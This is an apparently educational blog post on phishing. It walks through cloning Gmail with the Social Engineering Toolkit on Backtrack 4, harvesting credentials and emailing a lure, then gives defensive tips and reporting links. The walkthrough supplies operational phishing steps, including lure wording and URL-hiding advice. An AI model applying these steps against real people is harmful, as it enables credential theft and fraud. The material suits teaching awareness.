The technical standpoint I will be demonstrating are the different types of phishing attacks throughout the upcoming series of posts. Phishing is defined as a "criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication." The electronic communication mostly comes in form of e-mail or instant messaging. Phishing attacks are becoming more prevalent with time and the amount of money being lost every year from individuals' and organizations' are rising.
Phishing attacks has been increasing over the last years. According to a study conducted by the Gartner consulting firm, more than 5 million people in the United States lost money due to phishing attacks as of September 2008 which represents an increase of 39.8% with regards to the previous year. Additionally, the average amount of money lost due to phishing attacks in 2008 was $351, an increase from $256 in 2005. McAfee reported in the white paper, Phishing and Pharming: Understanding Phishing and Pharming, that $1.2 Billion was lost in 2003 due to phishing attacks. In 2007, Gartner reported, $3.2 Billion was lost due to phishing attacks.
These figures alone demonstrate that the general public is not aware of the types of phishing attacks or they are not taking it seriously. Another reason for my desire to write these series of posts happened after reading numerous articles from individuals' that fell victim to these attacks because they do not understand how it happened. Furthermore, I recently came across a McAfee sponsored website named, Stop H*Commerce. The website is very informative on how to protect yourself online from phishing attacks and identity theft. There is also a six episode series showing real life stories of people that got their lives destroyed by these heartless thieves. Lastly, a security vendor - Panda Security - released the top 10 Internet scams of the last decade and all ten Internet scams are some form of phishing attack or social engineering.
Now, onto the demonstration. For the first part of the series, I will be presenting a phishing attack to steal login credentials. For simplicity, I will be stealing email credentials but this process could be used for anything in relation to credit card information; such as, PayPal, online banking credentials, eBay, etc. In short, I will be sending an email containing a link to a spoofed website. In this case, it will be a counterfeit Gmail website. Once the victim clicks the link and enters their login information, that information will automatically be sent back to me and the fraud site will be redirected to the official Gmail website.
- You may click on any of the screenshots for a bigger picture and greater clarity.
- All links open in a new window.
1. A computer to run Backtrack 4 - This is a Linux distribution containing a collection of penetration testing tools. We will be using the Social Engineering Toolkit. These tools are included with Backtrack distribution.
- This link provides detailed instructions on multiple ways to run Backtrack on your computer.
1. Boot up Backtrack. The login is "root" and the password is "toor." Do not include quotes or the period at the end of toor. Type "startx" at the next prompt.
2. Open up a Konsole window. It is the 3rd icon from the bottom right.
3. Type /ETC/INIT.D/NETWORKING START press enter. This will get our IP address that we will need later in this tutorial.
4. Type CLEAR press enter to clear the screen.
5. Type CD /PENTEST/EXPLOITS/SET and press enter to reach the Social Engineering Toolkit (SET) directory.
6. Type NANO CONFIG/SET_CONFIG to change the configuration of the SET.
7. Use the down arrow key until you reach the setting for "WEBATTACK_EMAIL" and make sure it is equal to "ON" instead of "OFF."
8. Hit ctrl + x to exit out of the configuration setting.
9. Now, let us start the SET.
10. Type ./SET
11. Select number "2" for Website Attack Vector
12. Select number "3" for Credential Harvester Attack Method
13. Select number "2" for the Site Cloner
14. Now we must decide the site we want to clone. Typically, the attacker will want to clone a website with login authentication. As mentioned earlier, I will clone the site of Gmail. Type HTTPS://GMAIL.COM and press enter.
15. We successfully cloned the website!!
16. Press enter again.
17. Type "1" since we are going to be attacking a single e-mail address. At this step, you may also attack as many e-mail addresses as you want by having the e-mail addresses typed in a text file with each one on their own line.
18. Type the e-mail address you want to lure in the phishing attack. As you see in the screenshot below, I typed LILRALPH713@GMAIL.COM.
19. At this step, we enter a source e-mail or we may spoof our e-mail address through the second option with the use of Sendmail. For simplicity of explanation and ease of intrusion, I will type a source e-mail. I will use SHBELAY@GMAIL.COM
20. Since we are using a specific source e-mail, we have to type in our password.
21. Now, for the deceitful e-mail we start with the subject. For this tutorial, I TYPE GMAIL AUTHENTICATION NEEDED IMMEDIATELY!
22. Onto the body of the email, I type CLICK ON THE LINK TO GO TO GMAIL AND CHANGE YOUR PASSWORD! HTTP://192.168.75.128 and press enter.
- The web address I give them is my BackTrack 4 computer's IP address. You can find this out by opening a new shell and typing IFCONFIG
- An attacker would add HTML coding to this message to hide the true URL address. In essence, the victim would see gmail.com but behind the HTML the URL would be a very similar address or an IP address.
23. Hit ctrl + c to exit the message editing.
25. Now, I go to my Windows XP computer and login into LILRALPH@GMAIL.COM to view the message.
|Notice the web address! Users do not usually pay attetion to this small detail because they believe what they see and the link that was clicked.|
|Entering my login information|
|Look at the address again. It has changed to the legit Gmail address. Within the login authentication check, the victim information was sent to the attacker at a remote location.|
The following are policies and procedures that are typically instated in organizations and educational institutions. I will reiterate most of the policies and add what I feel is important.
- Go to Stop H*Commerce and read the "Resource Center" - located at the top menu bar - and educate yourself on phishing techniques and tips on protection.
- Read my previous post, Security Essential for a New Personal Computer.
- Read the Federal Trade Commission's article, How Not to Get Hooked by a "Phishing Scam."
- The Internet Crime Complaint Center (IC3) has some great tips for various cyber crimes @ Internet Crime Prevention Tips.
- Never reply to an e-mail with your username, password, ID, or any other personal information. I cannot imagine an organization asking for this type of information. If it seems real, call the company or the help desk number that is posted on the official website - not the e-mail.
- Never click on a link that directs you to a website where you must login to access information. Open a new tab or window and type the address manually.
- Change all the passwords that were exposed.
- Contact the institutions that was being impersonated and inform them of the situation.
- If your social security number, credit card numbers, driver license information, etc. was exposed, contact the following three major credit bureaus: Equifax, Experian, TransUnion.
- If possible, forward the e-mail to the institution that was being impersonated and to the FTC @ email@example.com
- Submit your complaint @ FTC Complaint Assistant. Here is the direct link.
- File a complaint with IC3 @ http://www.ic3.gov/complaint/default.aspx
- Social Engineering (security)
- Phishing and Pharming - Understanding phishing and pharming by McAfee
- Gartner Survey Shows Phishing Attacks Escalated in 2001; More than $3 Billion Lost to These Attacks
- Nigerian scam tops list of decade's online cons